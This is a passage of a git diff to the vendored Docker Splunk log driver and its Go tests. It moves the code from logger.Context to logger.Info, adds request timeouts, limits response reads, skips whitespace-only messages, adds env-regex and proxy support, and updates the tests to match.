-	attrs := ctx.ExtraAttributes(nil)
+	attrs, err := info.ExtraAttributes(nil)
+	if err != nil {
+		return nil, err
+	}
 
 	var (
 		postMessagesFrequency = getAdvancedOptionDuration(envVarPostMessagesFrequency, defaultPostMessagesFrequency)
@@ -260,7 +272,7 @@ func New(ctx logger.Context) (logger.Logger, error) {
 
 	// By default we verify connection, but we allow use to skip that
 	verifyConnection := true
-	if verifyConnectionStr, ok := ctx.Config[splunkVerifyConnectionKey]; ok {
+	if verifyConnectionStr, ok := info.Config[splunkVerifyConnectionKey]; ok {
 		var err error
 		verifyConnection, err = strconv.ParseBool(verifyConnectionStr)
 		if err != nil {
@@ -275,7 +287,7 @@ func New(ctx logger.Context) (logger.Logger, error) {
 	}
 
 	var splunkFormat string
-	if splunkFormatParsed, ok := ctx.Config[splunkFormatKey]; ok {
+	if splunkFormatParsed, ok := info.Config[splunkFormatKey]; ok {
 		switch splunkFormatParsed {
 		case splunkFormatInline:
 		case splunkFormatJSON:
@@ -336,7 +348,7 @@ func (l *splunkLoggerInline) Log(msg *logger.Message) error {
 	event.Source = msg.Source
 
 	message.Event = &event
-
+	logger.PutMessage(msg)
 	return l.queueMessageAsync(message)
 }
 
@@ -354,15 +366,20 @@ func (l *splunkLoggerJSON) Log(msg *logger.Message) error {
 	event.Source = msg.Source
 
 	message.Event = &event
-
+	logger.PutMessage(msg)
 	return l.queueMessageAsync(message)
 }
 
 func (l *splunkLoggerRaw) Log(msg *logger.Message) error {
+	// empty or whitespace-only messages are not accepted by HEC
+	if strings.TrimSpace(string(msg.Line)) == "" {
+		return nil
+	}
+
 	message := l.createSplunkMessage(msg)
 
 	message.Event = string(append(l.prefix, msg.Line...))
-
+	logger.PutMessage(msg)
 	return l.queueMessageAsync(message)
 }
 
@@ -406,13 +423,18 @@ func (l *splunkLogger) worker() {
 
 func (l *splunkLogger) postMessages(messages []*splunkMessage, lastChance bool) []*splunkMessage {
 	messagesLen := len(messages)
+
+	ctx, cancel := context.WithTimeout(context.Background(), batchSendTimeout)
+	defer cancel()
+
 	for i := 0; i < messagesLen; i += l.postMessagesBatchSize {
 		upperBound := i + l.postMessagesBatchSize
 		if upperBound > messagesLen {
 			upperBound = messagesLen
 		}
-		if err := l.tryPostMessages(messages[i:upperBound]); err != nil {
-			logrus.Error(err)
+
+		if err := l.tryPostMessages(ctx, messages[i:upperBound]); err != nil {
+			logrus.WithError(err).WithField("module", "logger/splunk").Warn("Error while sending logs")
 			if messagesLen-i >= l.bufferMaximum || lastChance {
 				// If this is last chance - print them all to the daemon log
 				if lastChance {
@@ -437,7 +459,7 @@ func (l *splunkLogger) postMessages(messages []*splunkMessage, lastChance bool)
 	return messages[:0]
 }
 
-func (l *splunkLogger) tryPostMessages(messages []*splunkMessage) error {
+func (l *splunkLogger) tryPostMessages(ctx context.Context, messages []*splunkMessage) error {
 	if len(messages) == 0 {
 		return nil
 	}
@@ -476,25 +498,28 @@ func (l *splunkLogger) tryPostMessages(messages []*splunkMessage) error {
 	if err != nil {
 		return err
 	}
+	req = req.WithContext(ctx)
 	req.Header.Set("Authorization", l.auth)
 	// Tell if we are sending gzip compressed body
 	if l.gzipCompression {
 		req.Header.Set("Content-Encoding", "gzip")
 	}
-	res, err := l.client.Do(req)
+	resp, err := l.client.Do(req)
 	if err != nil {
 		return err
 	}
-	defer res.Body.Close()
-	if res.StatusCode != http.StatusOK {
-		var body []byte
-		body, err = ioutil.ReadAll(res.Body)
+	defer func() {
+		pools.Copy(ioutil.Discard, resp.Body)
+		resp.Body.Close()
+	}()
+	if resp.StatusCode != http.StatusOK {
+		rdr := io.LimitReader(resp.Body, maxResponseSize)
+		body, err := ioutil.ReadAll(rdr)
 		if err != nil {
 			return err
 		}
-		return fmt.Errorf("%s: failed to send event - %s - %s", driverName, res.Status, body)
+		return fmt.Errorf("%s: failed to send event - %s - %s", driverName, resp.Status, string(body))
 	}
-	io.Copy(ioutil.Discard, res.Body)
 	return nil
 }
 
@@ -538,6 +563,7 @@ func ValidateLogOpt(cfg map[string]string) error {
 		case splunkGzipCompressionKey:
 		case splunkGzipCompressionLevelKey:
 		case envKey:
+		case envRegexKey:
 		case labelsKey:
 		case tagKey:
 		default:
@@ -547,8 +573,8 @@ func ValidateLogOpt(cfg map[string]string) error {
 	return nil
 }
 
-func parseURL(ctx logger.Context) (*url.URL, error) {
-	splunkURLStr, ok := ctx.Config[splunkURLKey]
+func parseURL(info logger.Info) (*url.URL, error) {
+	splunkURLStr, ok := info.Config[splunkURLKey]
 	if !ok {
 		return nil, fmt.Errorf("%s: %s is expected", driverName, splunkURLKey)
 	}
@@ -576,20 +602,22 @@ func verifySplunkConnection(l *splunkLogger) error {
 	if err != nil {
 		return err
 	}
-	res, err := l.client.Do(req)
+	resp, err := l.client.Do(req)
 	if err != nil {
 		return err
 	}
-	if res.Body != nil {
-		defer res.Body.Close()
-	}
-	if res.StatusCode != http.StatusOK {
-		var body []byte
-		body, err = ioutil.ReadAll(res.Body)
+	defer func() {
+		pools.Copy(ioutil.Discard, resp.Body)
+		resp.Body.Close()
+	}()
+
+	if resp.StatusCode != http.StatusOK {
+		rdr := io.LimitReader(resp.Body, maxResponseSize)
+		body, err := ioutil.ReadAll(rdr)
 		if err != nil {
 			return err
 		}
-		return fmt.Errorf("%s: failed to verify connection - %s - %s", driverName, res.Status, body)
+		return fmt.Errorf("%s: failed to verify connection - %s - %s", driverName, resp.Status, string(body))
 	}
 	return nil
 }
diff --git a/vendor/github.com/docker/docker/daemon/logger/splunk/splunk_test.go b/vendor/github.com/docker/docker/daemon/logger/splunk/splunk_test.go
index df74cbad5f..cfb83e80d1 100644
--- a/vendor/github.com/docker/docker/daemon/logger/splunk/splunk_test.go
+++ b/vendor/github.com/docker/docker/daemon/logger/splunk/splunk_test.go
@@ -1,13 +1,18 @@
-package splunk
+package splunk // import "github.com/docker/docker/daemon/logger/splunk"
 
 import (
 	"compress/gzip"
+	"context"
 	"fmt"
+	"net/http"
 	"os"
+	"runtime"
 	"testing"
 	"time"
 
 	"github.com/docker/docker/daemon/logger"
+	"gotest.tools/assert"
+	"gotest.tools/env"
 )
 
 // Validate options
@@ -25,9 +30,10 @@ func TestValidateLogOpt(t *testing.T) {
 		splunkVerifyConnectionKey:     "true",
 		splunkGzipCompressionKey:      "true",
 		splunkGzipCompressionLevelKey: "1",
-		envKey:    "a",
-		labelsKey: "b",
-		tagKey:    "c",
+		envKey:      "a",
+		envRegexKey: "^foo",
+		labelsKey:   "b",
+		tagKey:      "c",
 	})
 	if err != nil {
 		t.Fatal(err)
@@ -43,10 +49,10 @@ func TestValidateLogOpt(t *testing.T) {
 
 // Driver require user to specify required options
 func TestNewMissedConfig(t *testing.T) {
-	ctx := logger.Context{
+	info := logger.Info{
 		Config: map[string]string{},
 	}
-	_, err := New(ctx)
+	_, err := New(info)
 	if err == nil {
 		t.Fatal("Logger driver should fail when no required parameters specified")
 	}
@@ -54,12 +60,12 @@ func TestNewMissedConfig(t *testing.T) {
 
 // Driver require user to specify splunk-url
 func TestNewMissedUrl(t *testing.T) {
-	ctx := logger.Context{
+	info := logger.Info{
 		Config: map[string]string{
 			splunkTokenKey: "4642492F-D8BD-47F1-A005-0C08AE4657DF",
 		},
 	}
-	_, err := New(ctx)
+	_, err := New(info)
 	if err.Error() != "splunk: splunk-url is expected" {
 		t.Fatal("Logger driver should fail when no required parameters specified")
 	}
@@ -67,24 +73,54 @@ func TestNewMissedUrl(t *testing.T) {
 
 // Driver require user to specify splunk-token
 func TestNewMissedToken(t *testing.T) {
-	ctx := logger.Context{
+	info := logger.Info{
 		Config: map[string]string{
 			splunkURLKey: "http://127.0.0.1:8088",
 		},
 	}
-	_, err := New(ctx)
+	_, err := New(info)
 	if err.Error() != "splunk: splunk-token is expected" {
 		t.Fatal("Logger driver should fail when no required parameters specified")
 	}
 }
 
+func TestNewWithProxy(t *testing.T) {
+	proxy := "http://proxy.testing:8888"
+	reset := env.Patch(t, "HTTP_PROXY", proxy)
+	defer reset()
+
+	// must not be localhost
+	splunkURL := "http://example.com:12345"
+	logger, err := New(logger.Info{
+		Config: map[string]string{
+			splunkURLKey:              splunkURL,
+			splunkTokenKey:            "token",
+			splunkVerifyConnectionKey: "false",
+		},
+		ContainerID: "containeriid",
+	})
+	assert.NilError(t, err)
+	splunkLogger := logger.(*splunkLoggerInline)
+
+	proxyFunc := splunkLogger.transport.Proxy
+	assert.Assert(t, proxyFunc != nil)
+
+	req, err := http.NewRequest("GET", splunkURL, nil)
+	assert.NilError(t, err)
+
+	proxyURL, err := proxyFunc(req)
+	assert.NilError(t, err)
+	assert.Assert(t, proxyURL != nil)
+	assert.Equal(t, proxy, proxyURL.String())
+}
+
 // Test default settings
 func TestDefault(t *testing.T) {
 	hec := NewHTTPEventCollectorMock(t)
 
 	go hec.Serve()
 
-	ctx := logger.Context{
+	info := logger.Info{
 		Config: map[string]string{
 			splunkURLKey:   hec.URL(),
 			splunkTokenKey: hec.token,
@@ -95,12 +131,12 @@ func TestDefault(t *testing.T) {
 		ContainerImageName: "container_image_name",
 	}
 
-	hostname, err := ctx.Hostname()
+	hostname, err := info.Hostname()
 	if err != nil {
 		t.Fatal(err)
 	}
 
-	loggerDriver, err := New(ctx)
+	loggerDriver, err := New(info)
 	if err != nil {
 		t.Fatal(err)
 	}
@@ -124,7 +160,7 @@ func TestDefault(t *testing.T) {
 		splunkLoggerDriver.nullMessage.Source != "" ||
 		splunkLoggerDriver.nullMessage.SourceType != "" ||
 		splunkLoggerDriver.nullMessage.Index != "" ||
-		splunkLoggerDriver.gzipCompression != false ||
+		splunkLoggerDriver.gzipCompression ||
 		splunkLoggerDriver.postMessagesFrequency != defaultPostMessagesFrequency ||
 		splunkLoggerDriver.postMessagesBatchSize != defaultPostMessagesBatchSize ||
 		splunkLoggerDriver.bufferMaximum != defaultBufferMaximum ||
@@ -133,11 +169,11 @@ func TestDefault(t *testing.T) {
 	}
 
 	message1Time := time.Now()
-	if err := loggerDriver.Log(&logger.Message{[]byte("{\"a\":\"b\"}"), "stdout", message1Time, nil, false}); err != nil {
+	if err := loggerDriver.Log(&logger.Message{Line: []byte("{\"a\":\"b\"}"), Source: "stdout", Timestamp: message1Time}); err != nil {
 		t.Fatal(err)
 	}
 	message2Time := time.Now()
-	if err := loggerDriver.Log(&logger.Message{[]byte("notajson"), "stdout", message2Time, nil, false}); err != nil {
+	if err := loggerDriver.Log(&logger.Message{Line: []byte("notajson"), Source: "stdout", Timestamp: message2Time}); err != nil {
 		t.Fatal(err)
 	}
 
@@ -206,7 +242,7 @@ func TestInlineFormatWithNonDefaultOptions(t *testing.T) {
 
 	go hec.Serve()
 
-	ctx := logger.Context{
+	info := logger.Info{
 		Config: map[string]string{
 			splunkURLKey:             hec.URL(),
 			splunkTokenKey:           hec.token,
@@ -215,8 +251,9 @@ func TestInlineFormatWithNonDefaultOptions(t *testing.T) {
 			splunkIndexKey:           "myindex",
 			splunkFormatKey:          splunkFormatInline,
 			splunkGzipCompressionKey: "true",
-			tagKey:    "{{.ImageName}}/{{.Name}}",
-			labelsKey: "a",
+			tagKey:      "{{.ImageName}}/{{.Name}}",
+			labelsKey:   "a",
+			envRegexKey: "^foo",
 		},
 		ContainerID:        "containeriid",
 		ContainerName:      "/container_name",
@@ -225,14 +262,15 @@ func TestInlineFormatWithNonDefaultOptions(t *testing.T) {
 		ContainerLabels: map[string]string{
 			"a": "b",
 		},
+		ContainerEnv: []string{"foo_finder=bar"},
 	}
 
-	hostname, err := ctx.Hostname()
+	hostname, err := info.Hostname()
 	if err != nil {
 		t.Fatal(err)
 	}
 
-	loggerDriver, err := New(ctx)
+	loggerDriver, err := New(info)
 	if err != nil {
 		t.Fatal(err)
 	}
@@ -252,7 +290,7 @@ func TestInlineFormatWithNonDefaultOptions(t *testing.T) {
 		splunkLoggerDriver.nullMessage.Source != "mysource" ||
 		splunkLoggerDriver.nullMessage.SourceType != "mysourcetype" ||
 		splunkLoggerDriver.nullMessage.Index != "myindex" ||
-		splunkLoggerDriver.gzipCompression != true ||
+		!splunkLoggerDriver.gzipCompression ||
 		splunkLoggerDriver.gzipCompressionLevel != gzip.DefaultCompression ||
 		splunkLoggerDriver.postMessagesFrequency != defaultPostMessagesFrequency ||
 		splunkLoggerDriver.postMessagesBatchSize != defaultPostMessagesBatchSize ||
@@ -262,7 +300,7 @@ func TestInlineFormatWithNonDefaultOptions(t *testing.T) {
 	}
 
 	messageTime := time.Now()
-	if err := loggerDriver.Log(&logger.Message{[]byte("1"), "stdout", messageTime, nil, false}); err != nil {
+	if err := loggerDriver.Log(&logger.Message{Line: []byte("1"), Source: "stdout", Timestamp: messageTime}); err != nil {
 		t.Fatal(err)
 	}
 
@@ -295,6 +333,7 @@ func TestInlineFormatWithNonDefaultOptions(t *testing.T) {
 			event["source"] != "stdout" ||
 			event["tag"] != "container_image_name/container_name" ||
 			event["attrs"].(map[string]interface{})["a"] != "b" ||
+			event["attrs"].(map[string]interface{})["foo_finder"] != "bar" ||
 			len(event) != 4 {
 			t.Fatalf("Unexpected event in message %v", event)
 		}
@@ -312,7 +351,7 @@ func TestJsonFormat(t *testing.T) {
 
 	go hec.Serve()
 
-	ctx := logger.Context{
+	info := logger.Info{
 		Config: map[string]string{
 			splunkURLKey:                  hec.URL(),
 			splunkTokenKey:                hec.token,
@@ -326,12 +365,12 @@ func TestJsonFormat(t *testing.T) {
 		ContainerImageName: "container_image_name",
 	}
 
-	hostname, err := ctx.Hostname()
+	hostname, err := info.Hostname()
 	if err != nil {
 		t.Fatal(err)
 	}
 
-	loggerDriver, err := New(ctx)
+	loggerDriver, err := New(info)
 	if err != nil {
 		t.Fatal(err)
 	}
@@ -351,7 +390,7 @@ func TestJsonFormat(t *testing.T) {
 		splunkLoggerDriver.nullMessage.Source != "" ||
 		splunkLoggerDriver.nullMessage.SourceType != "" ||
 		splunkLoggerDriver.nullMessage.Index != "" ||
-		splunkLoggerDriver.gzipCompression != true ||
+		!splunkLoggerDriver.gzipCompression ||
 		splunkLoggerDriver.gzipCompressionLevel != gzip.BestSpeed ||
 		splunkLoggerDriver.postMessagesFrequency != defaultPostMessagesFrequency ||
 		splunkLoggerDriver.postMessagesBatchSize != defaultPostMessagesBatchSize ||
@@ -361,11 +400,11 @@ func TestJsonFormat(t *testing.T) {
 	}
 
 	message1Time := time.Now()
-	if err := loggerDriver.Log(&logger.Message{[]byte("{\"a\":\"b\"}"), "stdout", message1Time, nil, false}); err != nil {
+	if err := loggerDriver.Log(&logger.Message{Line: []byte("{\"a\":\"b\"}"), Source: "stdout", Timestamp: message1Time}); err != nil {
 		t.Fatal(err)
 	}
 	message2Time := time.Now()
-	if err := loggerDriver.Log(&logger.Message{[]byte("notjson"), "stdout", message2Time, nil, false}); err != nil {
+	if err := loggerDriver.Log(&logger.Message{Line: []byte("notjson"), Source: "stdout", Timestamp: message2Time}); err != nil {
 		t.Fatal(err)
 	}
 
@@ -431,7 +470,7 @@ func TestRawFormat(t *testing.T) {
 
 	go hec.Serve()
 
-	ctx := logger.Context{
+	info := logger.Info{
 		Config: map[string]string{
 			splunkURLKey:    hec.URL(),
 			splunkTokenKey:  hec.token,
@@ -443,15 +482,11 @@ func TestRawFormat(t *testing.T) {
 		ContainerImageName: "container_image_name",
 	}
 
-	hostname, err := ctx.Hostname()
-	if err != nil {
-		t.Fatal(err)
-	}
+	hostname, err := info.Hostname()
+	assert.NilError(t, err)
 
-	loggerDriver, err := New(ctx)
-	if err != nil {
-		t.Fatal(err)
-	}
+	loggerDriver, err := New(info)
+	assert.NilError(t, err)
 
 	if !hec.connectionVerified {
 		t.Fatal("By default connection should be verified")
@@ -468,7 +503,7 @@ func TestRawFormat(t *testing.T) {
 		splunkLoggerDriver.nullMessage.Source != "" ||
 		splunkLoggerDriver.nullMessage.SourceType != "" ||
 		splunkLoggerDriver.nullMessage.Index != "" ||
-		splunkLoggerDriver.gzipCompression != false ||
+		splunkLoggerDriver.gzipCompression ||
 		splunkLoggerDriver.postMessagesFrequency != defaultPostMessagesFrequency ||
 		splunkLoggerDriver.postMessagesBatchSize != defaultPostMessagesBatchSize ||
 		splunkLoggerDriver.bufferMaximum != defaultBufferMaximum ||
@@ -478,11 +513,11 @@ func TestRawFormat(t *testing.T) {
 	}
 
 	message1Time := time.Now()
-	if err := loggerDriver.Log(&logger.Message{[]byte("{\"a\":\"b\"}"), "stdout", message1Time, nil, false}); err != nil {
+	if err := loggerDriver.Log(&logger.Message{Line: []byte("{\"a\":\"b\"}"), Source: "stdout", Timestamp: message1Time}); err != nil {
 		t.Fatal(err)
 	}
 	message2Time := time.Now()
-	if err := loggerDriver.Log(&logger.Message{[]byte("notjson"), "stdout", message2Time, nil, false}); err != nil {
+	if err := loggerDriver.Log(&logger.Message{Line: []byte("notjson"), Source: "stdout", Timestamp: message2Time}); err != nil {
 		t.Fatal(err)
 	}
 
@@ -541,7 +576,7 @@ func TestRawFormatWithLabels(t *testing.T) {
 
 	go hec.Serve()
 
-	ctx := logger.Context{
+	info := logger.Info{
 		Config: map[string]string{
 			splunkURLKey:    hec.URL(),
 			splunkTokenKey:  hec.token,
@@ -557,12 +592,12 @@ func TestRawFormatWithLabels(t *testing.T) {
 		},
 	}
 
-	hostname, err := ctx.Hostname()
+	hostname, err := info.Hostname()
 	if err != nil {
 		t.Fatal(err)
 	}
 
-	loggerDriver, err := New(ctx)
+	loggerDriver, err := New(info)
 	if err != nil {
 		t.Fatal(err)
 	}
@@ -582,7 +617,7 @@ func TestRawFormatWithLabels(t *testing.T) {
 		splunkLoggerDriver.nullMessage.Source != "" ||
 		splunkLoggerDriver.nullMessage.SourceType != "" ||
 		splunkLoggerDriver.nullMessage.Index != "" ||
-		splunkLoggerDriver.gzipCompression != false ||
+		splunkLoggerDriver.gzipCompression ||
 		splunkLoggerDriver.postMessagesFrequency != defaultPostMessagesFrequency ||
 		splunkLoggerDriver.postMessagesBatchSize != defaultPostMessagesBatchSize ||
 		splunkLoggerDriver.bufferMaximum != defaultBufferMaximum ||
@@ -592,11 +627,11 @@ func TestRawFormatWithLabels(t *testing.T) {
 	}
 
 	message1Time := time.Now()
-	if err := loggerDriver.Log(&logger.Message{[]byte("{\"a\":\"b\"}"), "stdout", message1Time, nil, false}); err != nil {
+	if err := loggerDriver.Log(&logger.Message{Line: []byte("{\"a\":\"b\"}"), Source: "stdout", Timestamp: message1Time}); err != nil {
 		t.Fatal(err)
 	}
 	message2Time := time.Now()
-	if err := loggerDriver.Log(&logger.Message{[]byte("notjson"), "stdout", message2Time, nil, false}); err != nil {
+	if err := loggerDriver.Log(&logger.Message{Line: []byte("notjson"), Source: "stdout", Timestamp: message2Time}); err != nil {
 		t.Fatal(err)
 	}
 
@@ -639,7 +674,7 @@ func TestRawFormatWithLabels(t *testing.T) {
 		t.Fatal(err)
 	} else {
 		if event != "containeriid a=b notjson" {
-			t.Fatalf("Unexpected event in message 1 %v", event)
+			t.Fatalf("Unexpected event in message 2 %v", event)
 		}
 	}
 
@@ -656,7 +691,7 @@ func TestRawFormatWithoutTag(t *testing.T) {
 
 	go hec.Serve()
 
-	ctx := logger.Context{
+	info := logger.Info{
 		Config: map[string]string{
 			splunkURLKey:    hec.URL(),
 			splunkTokenKey:  hec.token,
@@ -669,12 +704,12 @@ func TestRawFormatWithoutTag(t *testing.T) {
 		ContainerImageName: "container_image_name",
 	}
 
-	hostname, err := ctx.Hostname()
+	hostname, err := info.Hostname()
 	if err != nil {
 		t.Fatal(err)
 	}
 
-	loggerDriver, err := New(ctx)
+	loggerDriver, err := New(info)
 	if err != nil {
 		t.Fatal(err)
 	}
@@ -694,7 +729,7 @@ func TestRawFormatWithoutTag(t *testing.T) {
 		splunkLoggerDriver.nullMessage.Source != "" ||
 		splunkLoggerDriver.nullMessage.SourceType != "" ||
 		splunkLoggerDriver.nullMessage.Index != "" ||
-		splunkLoggerDriver.gzipCompression != false ||
+		splunkLoggerDriver.gzipCompression ||
 		splunkLoggerDriver.postMessagesFrequency != defaultPostMessagesFrequency ||
 		splunkLoggerDriver.postMessagesBatchSize != defaultPostMessagesBatchSize ||
 		splunkLoggerDriver.bufferMaximum != defaultBufferMaximum ||
@@ -705,11 +740,15 @@ func TestRawFormatWithoutTag(t *testing.T) {
 	}
 
 	message1Time := time.Now()
-	if err := loggerDriver.Log(&logger.Message{[]byte("{\"a\":\"b\"}"), "stdout", message1Time, nil, false}); err != nil {
+	if err := loggerDriver.Log(&logger.Message{Line: []byte("{\"a\":\"b\"}"), Source: "stdout", Timestamp: message1Time}); err != nil {
 		t.Fatal(err)
 	}
 	message2Time := time.Now()
-	if err := loggerDriver.Log(&logger.Message{[]byte("notjson"), "stdout", message2Time, nil, false}); err != nil {
+	if err := loggerDriver.Log(&logger.Message{Line: []byte("notjson"), Source: "stdout", Timestamp: message2Time}); err != nil {
+		t.Fatal(err)
+	}
+	message3Time := time.Now()
+	if err := loggerDriver.Log(&logger.Message{Line: []byte(" "), Source: "stdout", Timestamp: message3Time}); err != nil {
 		t.Fatal(err)
 	}
 
@@ -718,6 +757,9 @@ func TestRawFormatWithoutTag(t *testing.T) {
 		t.Fatal(err)
 	}
 
+	// message3 would have an empty or whitespace only string in the "event" field
+	// both of which are not acceptable to HEC
+	// thus here we must expect 2 messages, not 3
 	if len(hec.messages) != 2 {
 		t.Fatal("Expected two messages")
 	}
@@ -752,7 +794,7 @@ func TestRawFormatWithoutTag(t *testing.T) {
 		t.Fatal(err)
 	} else {
 		if event != "notjson" {
-			t.Fatalf("Unexpected event in message 1 %v", event)
+			t.Fatalf("Unexpected event in message 2 %v", event)
 		}
 	}
 
@@ -773,7 +815,7 @@ func TestBatching(t *testing.T) {
 
 	go hec.Serve()
 
-	ctx := logger.Context{
+	info := logger.Info{
 		Config: map[string]string{
 			splunkURLKey:   hec.URL(),
 			splunkTokenKey: hec.token,
@@ -784,13 +826,13 @@ func TestBatching(t *testing.T) {
 		ContainerImageName: "container_image_name",
 	}
 
-	loggerDriver, err := New(ctx)
+	loggerDriver, err := New(info)
 	if err != nil {
 		t.Fatal(err)
 	}
 
 	for i := 0; i < defaultStreamChannelSize*4; i++ {
-		if err := loggerDriver.Log(&logger.Message{[]byte(fmt.Sprintf("%d", i)), "stdout", time.Now(), nil, false}); err != nil {
+		if err := loggerDriver.Log(&logger.Message{Line: []byte(fmt.Sprintf("%d", i)), Source: "stdout", Timestamp: time.Now()}); err != nil {
 			t.Fatal(err)
 		}
 	}
@@ -839,7 +881,7 @@ func TestFrequency(t *testing.T) {
 
 	go hec.Serve()
 
-	ctx := logger.Context{
+	info := logger.Info{
 		Config: map[string]string{
 			splunkURLKey:   hec.URL(),
 			splunkTokenKey: hec.token,
@@ -850,13 +892,13 @@ func TestFrequency(t *testing.T) {
 		ContainerImageName: "container_image_name",
 	}
 
-	loggerDriver, err := New(ctx)
+	loggerDriver, err := New(info)
 	if err != nil {
 		t.Fatal(err)
 	}
 
 	for i := 0; i < 10; i++ {
-		if err := loggerDriver.Log(&logger.Message{[]byte(fmt.Sprintf("%d", i)), "stdout", time.Now(), nil, false}); err != nil {
+		if err := loggerDriver.Log(&logger.Message{Line: []byte(fmt.Sprintf("%d", i)), Source: "stdout", Timestamp: time.Now()}); err != nil {
 			t.Fatal(err)
 		}
 		time.Sleep(15 * time.Millisecond)
@@ -920,7 +962,7 @@ func TestOneMessagePerRequest(t *testing.T) {
 
 	go hec.Serve()
 
-	ctx := logger.Context{
+	info := logger.Info{
 		Config: map[string]string{
 			splunkURLKey:   hec.URL(),
 			splunkTokenKey: hec.token,
@@ -931,13 +973,13 @@ func TestOneMessagePerRequest(t *testing.T) {
 		ContainerImageName: "container_image_name",
 	}
 
-	loggerDriver, err := New(ctx)
+	loggerDriver, err := New(info)
 	if err != nil {
 		t.Fatal(err)
 	}
 
 	for i := 0; i < 10; i++ {
-		if err := loggerDriver.Log(&logger.Message{[]byte(fmt.Sprintf("%d", i)), "stdout", time.Now(), nil, false}); err != nil {
+		if err := loggerDriver.Log(&logger.Message{Line: []byte(fmt.Sprintf("%d", i)), Source: "stdout", Timestamp: time.Now()}); err != nil {
 			t.Fatal(err)
 		}
 	}
@@ -994,7 +1036,7 @@ func TestVerify(t *testing.T) {
 	hec.simulateServerError = true
 	go hec.Serve()
 
-	ctx := logger.Context{
+	info := logger.Info{
 		Config: map[string]string{
 			splunkURLKey:   hec.URL(),
 			splunkTokenKey: hec.token,
@@ -1005,7 +1047,7 @@ func TestVerify(t *testing.T) {
 		ContainerImageName: "container_image_name",
 	}
 
-	_, err := New(ctx)
+	_, err := New(info)
 	if err == nil {
 		t.Fatal("Expecting driver to fail, when server is unresponsive")
 	}
@@ -1023,7 +1065,7 @@ func TestSkipVerify(t *testing.T) {
 	hec.simulateServerError = true
 	go hec.Serve()
 
-	ctx := logger.Context{
+	info := logger.Info{
 		Config: map[string]string{
 			splunkURLKey:              hec.URL(),
 			splunkTokenKey:            hec.token,
@@ -1035,7 +1077,7 @@ func TestSkipVerify(t *testing.T) {
 		ContainerImageName: "container_image_name",
 	}
 
-	loggerDriver, err := New(ctx)
+	loggerDriver, err := New(info)
 	if err != nil {
 		t.Fatal(err)
 	}
@@ -1045,7 +1087,7 @@ func TestSkipVerify(t *testing.T) {
 	}
 
 	for i := 0; i < defaultStreamChannelSize*2; i++ {
-		if err := loggerDriver.Log(&logger.Message{[]byte(fmt.Sprintf("%d", i)), "stdout", time.Now(), nil, false}); err != nil {
+		if err := loggerDriver.Log(&logger.Message{Line: []byte(fmt.Sprintf("%d", i)), Source: "stdout", Timestamp: time.Now()}); err != nil {
 			t.Fatal(err)
 		}
 	}
@@ -1054,10 +1096,10 @@ func TestSkipVerify(t *testing.T) {
 		t.Fatal("No messages should be accepted at this point")
 	}
 
-	hec.simulateServerError = false
+	hec.simulateErr(false)
 
 	for i := defaultStreamChannelSize * 2; i < defaultStreamChannelSize*4; i++ {
-		if err := loggerDriver.Log(&logger.Message{[]byte(fmt.Sprintf("%d", i)), "stdout", time.Now(), nil, false}); err != nil {
+		if err := loggerDriver.Log(&logger.Message{Line: []byte(fmt.Sprintf("%d", i)), Source: "stdout", Timestamp: time.Now()}); err != nil {
 			t.Fatal(err)
 		}
 	}
@@ -1102,10 +1144,10 @@ func TestBufferMaximum(t *testing.T) {
 	}
 
 	hec := NewHTTPEventCollectorMock(t)
-	hec.simulateServerError = true
+	hec.simulateErr(true)
 	go hec.Serve()
 
-	ctx := logger.Context{
+	info := logger.Info{
 		Config: map[string]string{
 			splunkURLKey:              hec.URL(),
 			splunkTokenKey:            hec.token,
@@ -1117,7 +1159,7 @@ func TestBufferMaximum(t *testing.T) {
 		ContainerImageName: "container_image_name",
 	}
 
-	loggerDriver, err := New(ctx)
+	loggerDriver, err := New(info)
 	if err != nil {
 		t.Fatal(err)
 	}
@@ -1127,7 +1169,7 @@ func TestBufferMaximum(t *testing.T) {
 	}
 
 	for i := 0; i < 11; i++ {
-		if err := loggerDriver.Log(&logger.Message{[]byte(fmt.Sprintf("%d", i)), "stdout", time.Now(), nil, false}); err != nil {
+		if err := loggerDriver.Log(&logger.Message{Line: []byte(fmt.Sprintf("%d", i)), Source: "stdout", Timestamp: time.Now()}); err != nil {
 			t.Fatal(err)
 		}
 	}
@@ -1194,7 +1236,7 @@ func TestServerAlwaysDown(t *testing.T) {
 	hec.simulateServerError = true
 	go hec.Serve()
 
-	ctx := logger.Context{
+	info := logger.Info{
 		Config: map[string]string{
 			splunkURLKey:              hec.URL(),
 			splunkTokenKey:            hec.token,
@@ -1206,7 +1248,7 @@ func TestServerAlwaysDown(t *testing.T) {
 		ContainerImageName: "container_image_name",
 	}
 
-	loggerDriver, err := New(ctx)
+	loggerDriver, err := New(info)
 	if err != nil {
 		t.Fatal(err)
 	}
@@ -1216,7 +1258,7 @@ func TestServerAlwaysDown(t *testing.T) {
 	}
 
 	for i := 0; i < 5; i++ {
-		if err := loggerDriver.Log(&logger.Message{[]byte(fmt.Sprintf("%d", i)), "stdout", time.Now(), nil, false}); err != nil {
+		if err := loggerDriver.Log(&logger.Message{Line: []byte(fmt.Sprintf("%d", i)), Source: "stdout", Timestamp: time.Now()}); err != nil {
 			t.Fatal(err)
 		}
 	}
@@ -1253,7 +1295,7 @@ func TestCannotSendAfterClose(t *testing.T) {
 	hec := NewHTTPEventCollectorMock(t)
 	go hec.Serve()
 
-	ctx := logger.Context{
+	info := logger.Info{
 		Config: map[string]string{
 			splunkURLKey:   hec.URL(),
 			splunkTokenKey: hec.token,
@@ -1264,12 +1306,12 @@ func TestCannotSendAfterClose(t *testing.T) {
 		ContainerImageName: "container_image_name",
 	}
 
-	loggerDriver, err := New(ctx)
+	loggerDriver, err := New(info)
 	if err != nil {
 		t.Fatal(err)
 	}
 
-	if err := loggerDriver.Log(&logger.Message{[]byte("message1"), "stdout", time.Now(), nil, false}); err != nil {
+	if err := loggerDriver.Log(&logger.Message{Line: []byte("message1"), Source: "stdout", Timestamp: time.Now()}); err != nil {
 		t.Fatal(err)
 	}
 
@@ -1278,7 +1320,7 @@ func TestCannotSendAfterClose(t *testing.T) {
 		t.Fatal(err)
 	}
 
-	if err := loggerDriver.Log(&logger.Message{[]byte("message2"), "stdout", time.Now(), nil, false}); err == nil {
+	if err := loggerDriver.Log(&logger.Message{Line: []byte("message2"), Source: "stdout", Timestamp: time.Now()}); err == nil {
 		t.Fatal("Driver should not allow to send messages after close")
 	}
 
@@ -1300,3 +1342,48 @@ func TestCannotSendAfterClose(t *testing.T) {
 		t.Fatal(err)
 	}
 }
+
+func TestDeadlockOnBlockedEndpoint(t *testing.T) {
+	hec := NewHTTPEventCollectorMock(t)
+	go hec.Serve()
